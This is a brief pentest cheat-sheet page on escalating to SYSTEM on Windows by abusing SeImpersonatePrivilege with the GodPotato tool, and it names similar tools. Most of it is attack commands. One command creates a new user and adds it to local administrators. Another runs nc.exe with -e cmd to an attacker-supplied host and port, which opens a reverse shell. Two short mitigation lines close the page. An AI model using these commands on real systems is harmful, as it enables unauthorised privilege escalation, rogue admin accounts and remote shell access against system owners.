SeImpersonatePrivilege Abuse
Table of contents
Exploit
Example below using GodPotato. SeImpersonatePrivilege can be also leveraged by JuicyPotato, PrintSpoofer, RoguePotato, and SharpEfsPotato.
# Check if SeImpersonatePrivilege is enabled for the current user.
whoami /priv
# Execute command as NT AUTHORITY/SYSTEM.
.\GodPotato.exe -cmd "net user $username $password /add; net localgroup administrators $username /add"
.\GodPotato.exe -cmd "nc.exe $lhost $lport -e cmd"
Recommendations
- Disable SeImpersonatePrivilege on domain and local users.
- Enforce EDR on Windows hosts to detect and block GodPotato-like exploits.